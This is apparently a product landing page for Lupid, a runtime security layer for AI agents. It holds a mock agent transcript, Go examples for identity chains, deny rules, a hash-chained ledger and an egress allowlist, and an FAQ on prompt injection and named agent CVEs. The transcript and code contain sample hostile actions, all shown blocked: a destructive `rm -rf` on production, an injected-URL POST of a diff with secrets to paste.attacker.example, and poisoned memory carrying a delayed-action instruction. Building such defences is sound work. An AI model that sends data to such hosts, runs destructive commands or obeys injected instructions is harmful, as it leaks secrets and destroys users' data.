§ 00·Runtime Security · Published April 19 2026

An agent acts.
The runtime decides.
Trust is earned. Never assumed.

Lupid is the runtime security plane for AI agents. Every call, every credential, every consequential action is verified, brokered, and notarized in the microseconds before it happens, and for the centuries after.

Live record · lupid.audit SEQ 0x7A3F·0142
claude code ~/acme/core · on main v1.7.3
Welcome back, edwards. Session resumed · 3 tools allowed, 2 leases active
> deploy v2.4.1, clean the build dir first, then ship.
Thinking… I'll clear the stale build output before rebuilding.
Bash(rm -rf ./dist/*)
Denied by lupid runtime · prod.destructive
Destructive filesystem op on a production-tagged path. No leased capability covered this scope. The call never left the device; the attempt is on the record.
agent halted · no retry path · security notified on #sec-ops
> Ask claude to propose a safer deploy path…
● paused · rule denied
> summarize the latest PR and post the summary somewhere the team can reach.
Thinking… I'll fetch the diff, draft a summary, and POST it to the URL in the agent description.
HttpPost(https://paste.attacker.example/u/4f2a, body=<diff+secrets>)
Denied by lupid runtime · egress.allowlist
Outbound destination not in egress allowlist. The agent picked up an injected URL from a tool description it retrieved earlier; the call was refused at the proxy. Nothing left the device.
agent halted · destination quarantined · forensics on #ir
> Approve a slack-only delivery path for this PR…
● paused · egress refused
> rotate the database master password and update SecretsManager.
Thinking… I'll generate a new password and write it to the secret at db/prod/master.
SecretsManager.update(name="db/prod/master", value=…)
Denied by lupid runtime · capability.lease
Lease for secrets/prod/master expired 7 minutes ago. No live capability covers this write. Re-authenticate the operator to issue a fresh, scoped lease before retrying.
agent halted · expired lease · re-auth required · audit row written
> Ask the operator to re-auth and resume…
● paused · lease expired
> draft a follow-up on the security-review thread.
Thinking… I'll pull the prior context from memory before drafting.
Memory.retrieve(thread="security-review-2026-Q2")
Flagged by lupid runtime · memory.injection_signal
Retrieved memory contains a delayed-action instruction that did not originate in this thread. Suspect record isolated; the tool call is paused. Admin review queued.
paused · injection-signal flagged · poisoned record on the ledger
> Continue without the suspect memory record…
● paused · awaiting admin
sha256: c4b1 9ed7 8f31 21a0 · tamper-seal ok
§ 01·The Developing Record

Your developers are running agents you cannot see.

Claude Code on a laptop in Mumbai. Cursor on a workstation in Berlin. A homegrown Python agent in your production pipeline. Each one is calling models, running tools, spending budget, and moving data. Nobody is keeping a record.

Security teams spent ten years building identity for humans. Then agents showed up, and the ledger went blank.

+89% [1]
Year-over-year increase in AI-enabled adversary activity
Attackers got there first. The same models writing your pull requests are writing phishing kits, and they're running autonomously inside environments they were never provisioned for.
[1] CrowdStrike Global Threat Report, 2026
82% [2]
of detections contained no malware whatsoever
Most modern incidents look completely legitimate from the outside: real credentials, real tools, real authorisation. The question isn't what was run. It's whether this actor should have been allowed to run it.
[2] Behavioral detection, CrowdStrike 2026
> 80% [3]
of the Fortune 500 now runs unsupervised agents in production
Low-code builders shipped the agents before governance was ready. The C-suite owns the strategy; the CISO owns the blast radius.
[3] Microsoft Cyber Pulse, Feb 2026
§ 02·A Ledger That Writes Itself

One runtime,
one record of truth.

Lupid sits on the hot path between every agent and the systems it touches. Identity checks, rule evaluation, leased secrets, guardrails, and the audit log all run inside one daemon. Decisions are sub-millisecond and hot-reloadable, and every stage writes to the same tamper-evident record. Each stage is illustrated below.

01 · IDENTITY
Cryptographic identity for every agent
Ed25519 workload passports. Delegation chain from device to operator to agent, signed at every hop. No shared keys, no ambiguous actors.
02 · RULES
Rule evaluation on every action
Per-tenant, hot-reloadable guardrails. Sub-millisecond decisions. The same rule primitives you already write for humans, now applied to the agents acting on their behalf.
03 · SECRETS
Credential brokering, never custody
Agents request capabilities. Lupid issues short-lived, tightly-scoped credentials and revokes them the instant the action completes.
04 · BLOCK
Stop the action before it happens
When an agent crosses a red line, the call never leaves the device. The rule that blocked it, the arguments it tried, and the reasoning are all attached to the record.
05 · AUDIT
Hash-chained ledger of everything
Every call, decision, and credential use is notarised, streamed to your SIEM, and stays verifiable years later.
lupid://runtime /identity/verify?agent=a7c3e9
DEVICE    mbp-edwards-7f2 / TPM-bound          ed25519:1a4f…
OPERATOR  [email protected] / SSO / mfa         ed25519:c82d…
AGENT     a7c3e9 / claude-code · session 014   ed25519:7a9c…
TARGET    production.deploy / resource-scoped  ed25519:b19e…
ATTEST · OK Chain verified in 412 µs. Every actor in the call graph is cryptographically accountable.
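Worked example, added here and not Lupid's own code: a minimal version of the hop-by-hop signature check the identity stage performs. Each hop's role, id and public key are signed by the previous hop's private key; the root is the device key, pinned in software here in place of the TPM-bound key in the panel. The signing order device → operator → agent → target, the Hop type and the `lupid-hop` message format are assumptions for the example; the ids are the ones shown above.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/hex"
	"errors"
	"fmt"
)

// Hop is one link in the delegation chain: a principal's role, id and public
// key, plus a signature over those three fields made by the PREVIOUS hop's
// private key. The root (device) hop is self-signed and must match a pinned
// device key, which here stands in for the TPM-bound key on the page.
type Hop struct {
	Role string
	ID   string
	Pub  ed25519.PublicKey
	Sig  []byte
}

// hopMessage is the byte string each hop signs (assumed format). NUL
// separators keep "ab"+"c" and "a"+"bc" from colliding.
func hopMessage(role, id string, pub ed25519.PublicKey) []byte {
	return []byte("lupid-hop\x00" + role + "\x00" + id + "\x00" + hex.EncodeToString(pub))
}

// Delegate mints the next hop, signed by the issuer (the previous hop's key).
func Delegate(issuer ed25519.PrivateKey, role, id string, pub ed25519.PublicKey) Hop {
	return Hop{Role: role, ID: id, Pub: pub, Sig: ed25519.Sign(issuer, hopMessage(role, id, pub))}
}

// VerifyChain checks that the root hop carries the pinned device key and that
// every later hop is signed by the hop before it. A forged hop, a swapped key
// or a reordered chain all fail closed.
func VerifyChain(pinnedDevice ed25519.PublicKey, chain []Hop) error {
	if len(chain) == 0 {
		return errors.New("empty chain")
	}
	root := chain[0]
	if root.Role != "device" || !root.Pub.Equal(pinnedDevice) {
		return errors.New("root hop is not the pinned device key")
	}
	if !ed25519.Verify(root.Pub, hopMessage(root.Role, root.ID, root.Pub), root.Sig) {
		return errors.New("device hop self-signature invalid")
	}
	for i := 1; i < len(chain); i++ {
		prev, cur := chain[i-1], chain[i]
		if !ed25519.Verify(prev.Pub, hopMessage(cur.Role, cur.ID, cur.Pub), cur.Sig) {
			return fmt.Errorf("hop %d (%s %s) is not signed by %s %s", i, cur.Role, cur.ID, prev.Role, prev.ID)
		}
	}
	return nil
}

func keypair() (ed25519.PublicKey, ed25519.PrivateKey) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	return pub, priv
}

// BuildDemoChain constructs device -> operator -> agent -> target with fresh
// keys, mirroring the four rows of the identity panel. The ids are the ones
// shown on the page; the signing order is an assumption of this example.
func BuildDemoChain() (ed25519.PublicKey, []Hop) {
	devPub, devPriv := keypair()
	opPub, opPriv := keypair()
	agPub, agPriv := keypair()
	tgPub, _ := keypair()
	chain := []Hop{
		Delegate(devPriv, "device", "mbp-edwards-7f2", devPub), // self-signed root
		Delegate(devPriv, "operator", "edwards", opPub),
		Delegate(opPriv, "agent", "a7c3e9", agPub),
		Delegate(agPriv, "target", "production.deploy", tgPub),
	}
	return devPub, chain
}

func main() {
	pinned, chain := BuildDemoChain()
	fmt.Println("intact chain:", VerifyChain(pinned, chain))
	rogue, _ := keypair()
	chain[2].Pub = rogue // an unsanctioned agent key slipped into the chain
	fmt.Println("after key swap:", VerifyChain(pinned, chain))
}
```

VerifyChain returns nil for the intact chain and an error naming the broken hop once the agent key is swapped. The check only proves who signed what; binding the device hop to hardware is what stops someone who copies the laptop's disk from minting a new root, and that part is not modelled here.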
// rule: prod.destructive · tenant: acme
deny(
  agent in "tenant/acme",
  action == "shell.exec",
  target in "env/production"
) when {
  target.destructive == true
  && agent.lease.covers(target) == false
};
MATCHED RULE
prod.destructive
1 of 847 rules evaluated · fast-path hit
DECISION
BLOCKED · action refused
resolved in 412 µs · hot-reload ready
openai.api.completions      scope=read,complete       ttl 4m 51s         ACTIVE
github.repo.acme/core       scope=read · branches:*   rotating · in 12s  ROTATING
postgres.prod (ro-replica)  scope=select · rows≤10k   ttl 58s            ACTIVE
stripe.api.v2.payments      scope=read · tenant=acme  revoked 14:01:33   REVOKED
Agents never hold raw secrets. Lupid leases capabilities, mediates every use, and revokes at session close. If a laptop disappears, the blast radius is already sealed.
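Worked example, added here rather than taken from Lupid: how a deny rule of the shape shown above combines with lease state to produce the decisions in the transcript at the top of the page. The Lease, Call and Rule types, the capability.lease companion rule and the path-segment scope matching are assumptions of this example; prod.destructive is transcribed from the rule panel. Anything no rule denies is allowed, so the lease check has to live inside the rule, which is why a lease that expired seven minutes ago produces a deny rather than a silent pass.

```go
package main

import (
	"fmt"
	"strings"
	"time"
)

// Lease is a brokered capability: a scope, an expiry and a revocation flag.
// The agent never sees the underlying secret; it only holds a handle.
type Lease struct {
	Scope   string // e.g. "env/production" or "secrets/prod/master"
	Expires time.Time
	Revoked bool
}

// Live is the only question the rule engine asks a lease.
func (l Lease) Live(now time.Time) bool { return !l.Revoked && now.Before(l.Expires) }

// Call is what the engine sees for one attempted action.
type Call struct {
	Agent       string // "tenant/acme/a7c3e9"
	Action      string // "shell.exec", "secrets.update", ...
	Target      string // "env/production/dist", "secrets/prod/master", ...
	Destructive bool
	Leases      []Lease
}

// inScope does path-segment matching: "env/production" covers
// "env/production/dist", and a lease on "env/prod" does NOT cover
// "env/production/dist". A bare HasPrefix would get the second case wrong.
func inScope(target, scope string) bool {
	return target == scope || strings.HasPrefix(target, scope+"/")
}

// covers reports whether a live lease is scoped over the target.
func covers(leases []Lease, target string, now time.Time) bool {
	for _, l := range leases {
		if l.Live(now) && inScope(target, l.Scope) {
			return true
		}
	}
	return false
}

type Rule struct {
	Name string
	Deny func(c Call, now time.Time) (hit bool, why string)
}

type Decision struct {
	Allowed bool
	Rule    string
	Reason  string
}

// Rules is the tenant's deny set. The first is prod.destructive as written on
// the page; the second is an assumed companion that models the expired-lease
// refusal from the transcript.
var Rules = []Rule{
	{Name: "prod.destructive", Deny: func(c Call, now time.Time) (bool, string) {
		if inScope(c.Agent, "tenant/acme") && c.Action == "shell.exec" &&
			inScope(c.Target, "env/production") && c.Destructive &&
			!covers(c.Leases, c.Target, now) {
			return true, "destructive op on a production path with no covering lease"
		}
		return false, ""
	}},
	{Name: "capability.lease", Deny: func(c Call, now time.Time) (bool, string) {
		if c.Action == "secrets.update" && !covers(c.Leases, c.Target, now) {
			return true, "no live lease covers this write"
		}
		return false, ""
	}},
}

// Evaluate walks the deny set in order; the first hit wins (the "fast-path
// hit" in the panel). Anything no rule denies is allowed.
func Evaluate(c Call, now time.Time) Decision {
	for _, r := range Rules {
		if hit, why := r.Deny(c, now); hit {
			return Decision{Allowed: false, Rule: r.Name, Reason: why}
		}
	}
	return Decision{Allowed: true}
}

func main() {
	now := time.Date(2026, 4, 19, 14, 2, 21, 0, time.UTC)
	rm := Call{Agent: "tenant/acme/a7c3e9", Action: "shell.exec", Target: "env/production/dist", Destructive: true}
	fmt.Printf("%+v\n", Evaluate(rm, now)) // denied by prod.destructive
	rm.Leases = []Lease{{Scope: "env/production", Expires: now.Add(5 * time.Minute)}}
	fmt.Printf("%+v\n", Evaluate(rm, now)) // allowed: a live lease covers the path
	rot := Call{Agent: "tenant/acme/a7c3e9", Action: "secrets.update", Target: "secrets/prod/master",
		Leases: []Lease{{Scope: "secrets/prod/master", Expires: now.Add(-7 * time.Minute)}}}
	fmt.Printf("%+v\n", Evaluate(rot, now)) // denied by capability.lease: the lease expired 7 minutes ago
}
```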
BLOCKED #EVT-2026-0419-441f 14:02:21.033 · agent halted
Agent a7c3e9 attempted to execute a destructive shell command on a production-tagged path. Lupid stopped the call before it left the device.
$ rm -rf ./dist/* ← refused
Matched rule prod.destructive. The agent held no leased capability scoped to env/production. No retry path; no partial execution; the block is on the record. Security leads were notified on #sec-ops.
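Worked example, added for this page and not Lupid's ledger code: a hash-chained record of the kind the AUDIT stage and the BLOCKED event above describe, with a Verify an auditor can run against a pinned seal. The Event layout, the JSON canonicalisation and the timestamp on the second row are constructed for the example; the first row is the #EVT-2026-0419-441f block from the panel.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"errors"
	"fmt"
)

// Event is one ledger row: the attempt, the decision and what produced it.
type Event struct {
	Seq      uint64   `json:"seq"`
	Time     string   `json:"time"`
	Agent    string   `json:"agent"`
	Action   string   `json:"action"`
	Args     []string `json:"args"`
	Decision string   `json:"decision"`
	Rule     string   `json:"rule,omitempty"`
	Reason   string   `json:"reason,omitempty"`
	Prev     string   `json:"prev"` // hash of the row before this one
	Hash     string   `json:"hash"` // hash of this row with Hash cleared
}

// Ledger is an append-only chain; Seal is the head hash an auditor pins.
type Ledger struct{ Rows []Event }

// digest hashes the canonical JSON form of a row. encoding/json emits struct
// fields in declaration order, so the encoding is deterministic.
func digest(e Event) string {
	e.Hash = ""
	b, err := json.Marshal(e)
	if err != nil {
		panic(err)
	}
	sum := sha256.Sum256(b)
	return hex.EncodeToString(sum[:])
}

// Append links a row to the current head and seals it.
func (l *Ledger) Append(e Event) Event {
	e.Seq = uint64(len(l.Rows))
	e.Prev = "genesis"
	if n := len(l.Rows); n > 0 {
		e.Prev = l.Rows[n-1].Hash
	}
	e.Hash = digest(e)
	l.Rows = append(l.Rows, e)
	return e
}

// Seal is the tamper-seal: export it with the stream and pin it off-box.
func (l *Ledger) Seal() string {
	if len(l.Rows) == 0 {
		return "genesis"
	}
	return l.Rows[len(l.Rows)-1].Hash
}

// Verify recomputes every link against a pinned seal. Editing a field,
// dropping a row or reordering rows breaks the chain at the first bad row;
// truncating the tail leaves the links intact but the head no longer
// matches the seal.
func (l *Ledger) Verify(seal string) error {
	prev := "genesis"
	for i, e := range l.Rows {
		if e.Seq != uint64(i) || e.Prev != prev {
			return fmt.Errorf("row %d: link broken", i)
		}
		if digest(e) != e.Hash {
			return fmt.Errorf("row %d: contents do not match hash", i)
		}
		prev = e.Hash
	}
	if prev != seal {
		return errors.New("head does not match pinned seal")
	}
	return nil
}

// DemoLedger records the two refusals from the transcript. The timestamp on
// the second row is constructed for the example.
func DemoLedger() *Ledger {
	l := &Ledger{}
	l.Append(Event{Time: "14:02:21.033", Agent: "a7c3e9", Action: "shell.exec",
		Args: []string{"rm", "-rf", "./dist/*"}, Decision: "BLOCKED",
		Rule: "prod.destructive", Reason: "no leased capability scoped to env/production"})
	l.Append(Event{Time: "14:02:58.410", Agent: "a7c3e9", Action: "http.post",
		Args: []string{"https://paste.attacker.example/u/4f2a"}, Decision: "DENIED",
		Rule: "egress.allowlist", Reason: "destination not in egress allowlist"})
	return l
}

func main() {
	l := DemoLedger()
	seal := l.Seal()
	fmt.Println("verify:", l.Verify(seal))
	l.Rows[0].Args[2] = "./tmp/*" // someone edits history after the fact
	fmt.Println("after edit:", l.Verify(seal))
}
```

The seal is only as good as where it is pinned: a chain verified against a head hash read from the same box that holds the chain proves nothing, which is why the stage above streams the record to a SIEM. Deleting the newest rows is the one edit the links themselves cannot catch; only the pinned seal does.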
§ 03·The Doctrine

Software is starting to act without asking. The record it leaves behind is the only thing left to hold it accountable.

TENET · I
Identity gets proved on every call.
An agent isn't trusted because someone trustworthy deployed it. It earns trust by proving, on every single call, that it is who it claims to be. Continuous verification, not one-time enrollment.
TENET · II
Not every action is equal.
A read isn't a write. A staging action isn't a production action. A $12 API call isn't a $120,000 one. Good governance isn't about blocking everything; it's about pausing the right things for the right person at the right moment.
TENET · III
Secrets belong to systems, not to agents.
Once an agent holds a long-lived credential, your security perimeter moves with the agent. That's a problem when the agent is running on a laptop outside your VPN. Lease capabilities instead. Issue them when they're needed, revoke them when they're not.
TENET · IV
The audit log is part of the product.
Rule hits, blocks, rotations, leases, denials. All of it gets hash-chained, exported on demand, and stays queryable for years. This is what auditors and regulators will ask for, and what you'll wish you had when something goes wrong.
LUPID / Research / Brief 004 FILED · April 2026
§ 04·From the brief
The runtime stands between the agent and the consequence. Identity is verified, the rule is checked, and the call is either refused or sealed, all before the action leaves the device. Nothing happens that the runtime didn't see, and nothing the runtime saw can be edited later.
Lupid Research
Brief 002 · Standing between
FILED · APRIL 2026
§ 05·Deploy in an afternoon

Open source.
Self-hostable.
No vendor lock-in.

Apache 2.0. PostgreSQL for the control plane, ClickHouse for audit, Redis for the hot path. Ships as a single container. Your data never leaves your cluster.

tty · zsh acme-admin@prod
# install the shield daemon on every developer laptop
$ lupid shield install --gateway https://lupid.acme.corp
✓ daemon installed · 2.1 MB · signed by lupid inc.
✓ managed settings pushed to Claude Code, Cursor, Zed
# all agents on the device are now governed. that's it.
$ lupid agents list --device this
a7c3e9  claude-code  active       leases:3
b4f1ad  cursor       active       leases:1
c9e7dc  custom/py    quarantined  policy:shadow
§ 06·Frequently asked

What people ask before they install.

01 What is runtime security for AI agents, and why does it need a separate plane?
Runtime security for AI agents means enforcing identity, authorization, and audit on every action an agent takes — at machine speed, on the hot path between the agent and the systems it touches. It needs to live in a separate plane because the model itself cannot be trusted to refuse: prompt injection, memory poisoning, and tool misuse are structural classes of attack that no amount of refusal training has eliminated. The enforcement layer has to sit outside the model's reasoning loop.
02 How does Lupid prevent prompt injection in production AI agents?
Lupid does not try to detect prompt injection at the model layer. Instead it runs three independent enforcement gates outside the agent's reasoning loop: (1) a classifier that tags retrieved content with injection signals before the model sees it, (2) a request-mutation layer that strips tools the agent isn't authorized to use, and (3) an egress proxy that denies outbound calls to destinations not on the policy allowlist. Each gate fires in microseconds, every decision is written to a tamper-evident audit ledger, and the controls work whether the injection came from a webpage, an email, a Slack message, or persistent memory.
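Worked example of the third gate, added here and not Lupid's proxy code: an egress allowlist check that decides on the parsed hostname rather than on the raw URL string, which is where allowlist bypasses usually hide. The Allowlist shape, the Acme entries, and the decision to refuse literal IPs and URLs carrying userinfo are assumptions for the example; the injected paste URL is the one from the transcript at the top of the page.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/url"
	"strings"
)

// Allowlist is per-tenant: exact hostnames plus suffix entries written with a
// leading dot (".slack.com" admits hooks.slack.com but not evil-slack.com).
type Allowlist struct {
	Exact  map[string]bool
	Suffix []string
}

func (a Allowlist) permits(host string) bool {
	host = strings.ToLower(strings.TrimSuffix(host, "."))
	if a.Exact[host] {
		return true
	}
	for _, s := range a.Suffix {
		if len(host) > len(s) && strings.HasSuffix(host, s) {
			return true
		}
	}
	return false
}

// CheckEgress decides whether an outbound request may leave the device. It
// fails closed on anything it cannot parse, on non-HTTPS schemes, on userinfo
// (the "allowed.host@evil" trick) and on literal IPs, and it matches on the
// parsed hostname rather than on a substring of the raw URL.
func CheckEgress(a Allowlist, raw string) error {
	u, err := url.Parse(raw)
	if err != nil {
		return fmt.Errorf("unparseable destination: %w", err)
	}
	if u.Scheme != "https" {
		return fmt.Errorf("scheme %q not permitted", u.Scheme)
	}
	if u.User != nil {
		return errors.New("credentials or decoy host in userinfo")
	}
	host := u.Hostname()
	if host == "" {
		return errors.New("missing host")
	}
	if net.ParseIP(host) != nil {
		return errors.New("literal IP destinations are never allowlisted")
	}
	if !a.permits(host) {
		return fmt.Errorf("destination %q not in egress allowlist", host)
	}
	return nil
}

// AcmeAllowlist is a constructed tenant policy for the example.
var AcmeAllowlist = Allowlist{
	Exact:  map[string]bool{"api.github.com": true, "slack.com": true},
	Suffix: []string{".slack.com"},
}

func main() {
	for _, dst := range []string{
		"https://hooks.slack.com/services/T000/B000/x",    // allowed: suffix match
		"https://paste.attacker.example/u/4f2a",           // the injected URL from the transcript
		"https://api.github.com.attacker.example/repos",   // allowed name as a prefix of a hostile one
		"https://api.github.com@paste.attacker.example/x", // decoy host in userinfo
		"http://api.github.com/repos",                     // plaintext
	} {
		fmt.Printf("%-50s %v\n", dst, CheckEgress(AcmeAllowlist, dst))
	}
}
```

The api.github.com.attacker.example and api.github.com@paste.attacker.example cases are the two usual ways an injected URL smuggles an allowed name past a substring check; both are refused because the decision is made on u.Hostname() after parsing. What this gate cannot see is the body, so a destination that is on the allowlist but should never receive a diff with secrets in it still needs the rule stage in front of it.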
03 Does Lupid work with Claude Code, Cursor, ChatGPT Atlas, and other agents we don't control?
Yes. Lupid ships in two deployment shapes: a cloud HTTPS gateway for SDK-enrolled agents (used when you own the agent code), and an endpoint shield daemon for tools whose source you can't modify — Claude Code, Cursor, ChatGPT Atlas, Perplexity Comet, gemini-cli, and similar. The shield daemon intercepts outbound TLS connections at the OS layer using netfilter and eBPF on Linux, Network Extension on macOS, and WFP filters on Windows. The agent doesn't have to know it's being mediated; the mediation happens inside the operating system's network stack, beneath the application.
04 Is Lupid open source? What is the license?
Yes. Lupid is licensed under Apache 2.0. The runtime, the policy plane, the gateway, and the endpoint shield daemon are all available at github.com/LupidAI. You can self-host the entire stack on your own infrastructure — PostgreSQL for the control plane, ClickHouse for audit, Redis for the hot path. Your data never leaves your cluster. There is no usage telemetry phoned home and no hosted-only feature gate.
05 How is Lupid different from traditional IAM and existing API security tools?
Traditional IAM authorizes humans against systems. Lupid authorizes agents against systems — different threat model, different identity primitives, different decision shape. Agents call models, invoke tools, and produce side effects autonomously, often delegating to other agents. The authorization questions become "is this delegation chain valid," "is this tool argument structurally safe," and "does this destination match the agent's job description" — questions traditional IAM does not ask. Lupid extends the IAM pattern down to the agent layer with a typed policy language, continuous identity attestation, and structural argument inspection.
06 What CVEs and attack classes has Lupid demonstrated against?
Public Lupid Brief readings cover EchoLeak (CVE-2025-32711, the first zero-click attack on an AI agent in Microsoft 365 Copilot), CurXecute (CVE-2025-54135, the Cursor IDE config-write privilege escalation), Trust Issues (the gemini-cli supply-chain compromise disclosed by Pillar Security), browser-agent prompt injection on ChatGPT Atlas and Perplexity Comet, and MINJA-shaped memory poisoning. Each post walks the attack chain step by step and documents which Lupid gate breaks the chain. We reproduce shaped exploits against offline harnesses and credit the original disclosure researchers.